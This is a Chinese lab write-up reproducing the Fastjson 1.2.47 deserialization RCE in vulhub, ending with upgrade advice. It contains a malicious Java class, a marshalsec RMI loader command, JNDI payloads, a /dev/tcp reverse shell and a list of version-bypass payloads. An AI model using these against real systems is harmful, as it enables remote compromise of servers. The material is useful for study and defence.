漏洞概述:
fastjson 是阿里巴巴的开源JSON解析库,它可以解析 JSON 格式的字符串,支持将 Java Bean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列化到 JavaBean。
首先,Fastjson提供了autotype功能,允许用户在反序列化数据中通过“@type”指定反序列化的类型,其次,Fastjson自定义的反序列化机制时会调用指定类中的setter方法及部分getter方法,那么当组件开启了autotype功能并且反序列化不可信数据时,攻击者可以构造数据,使目标应用的代码执行流程进入特定类的特定setter或者getter方法中,若指定类的指定方法中有可被恶意利用的逻辑(也就是通常所指的“Gadget”),则会造成一些严重的安全问题。并且在Fastjson 1.2.47及以下版本中,利用其缓存机制可实现对未开启autotype功能的绕过。
影响版本:
Fastjson 1.2.48之前版本。
漏洞环境:
vuhub(fastjson)
三台主机。我这里用的是两台主机
主机A:Fastjson环境(1.2.47)
主机B,C:RMI服务和恶意java类(win10)这里可以分为两台主机。
主机A搭建:
https://github.com/vulhub/vulhub/tree/master/fastjson/1.2.47-rce
主机B(win10)准备:
恶意java:
// javac TouchFile.java
import java.lang.Runtime;
import java.lang.Process;
public class TouchFile {
static {
try {
Runtime rt = Runtime.getRuntime();
String[] commands = {"touch", "/tmp/success"};
Process pc = rt.exec(commands);
pc.waitFor();
} catch (Exception e) {
// do nothing
}
}
}
将上面代码保存为***.Java,然后放到web服务根目录,最后编译成class文件。
javac TouchFile.java
搭建web服务可以百度,windows10是在程序和功能添加即可。
主机C还是win10):
这里需要借助marshalsec项目,启动一个RMI服务器,监听9999端口,并加载远程类
下载地址:https://github.com/mbechler/marshalsec
因为这里给的直接是项目,所以需要自己打包下:
打包可以用mvn打包,所以需要先安装mvn
使用mvn clean package命令即可打包
开启RMI服务:
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://web服务得那个ip/#TouchFile" 9999
注意编写格式就可以了#TouchFile,有个#,然后.class不用加。
漏洞复现:
直接访问fastjson,利用burp抓包
这里改成POST请求:然后加上payload:
poc:
{
"a":{
"@type":"java.lang.Class",
"val":"com.sun.rowset.JdbcRowSetImpl"
},
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://监听服务器的ip:9999/TouchFile",
"autoCommit":true
}
}
验证是否执行命令:
进入fastjson:
查看/tmp目录下是否成功生成success文件,有则表示生成成功
复现升级:
既然可以创建目录,那么也可以反弹shell。这里反弹shell,我用的kali主机。
步骤和前面一样,换一个反弹shell的class,修改下代码:
// javac shell.java
import java.lang.Runtime;
import java.lang.Process;
public class shell {
static {
try {
Runtime rt = Runtime.getRuntime();
String[] commands = {"/bin/bash","-c","bash -i >& /dev/tcp/反弹shellip/5555 0>&1"};
Process pc = rt.exec(commands);
pc.waitFor();
} catch (Exception e) {
// do nothing
}
}
}
漏洞修复:
0x04 修复建议
1.fastjson 的最新版本为 1.2.58 下载地址
建议广大用户对自身的业务/产品进行组件自查,确认 fastjson 版本至少升级到 1.2.58。
同时确认自身服务的 Java 环境版本,低于 8u121 7u13 6u141 的用户也请及时升级环境版本,以防受到其他严重漏洞影响。
绕过版本poc:
来源于 https://github.com/shengqi158/fastjson-remote-code-execute-poc
1.2.24
{"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://localhost:1099/Exploit", "autoCommit":true}}
未知版本(1.2.24-41之间)
{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true}
1.2.41
{"@type":"Lcom.sun.rowset.RowSetImpl;","dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true}
1.2.42
{"@type":"LLcom.sun.rowset.JdbcRowSetImpl;;","dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true};
1.2.43
{"@type":"[com.sun.rowset.JdbcRowSetImpl"[{"dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true]}
1.2.45
{"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties":{"data_source":"rmi://localhost:1099/Exploit"}}
1.2.47
{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true}}}
参考链接:
https://www.freebuf.com/vuls/208339.html
http://baijiahao.baidu.com/s?id=1648108811568362514&wfr=spider&for=pc
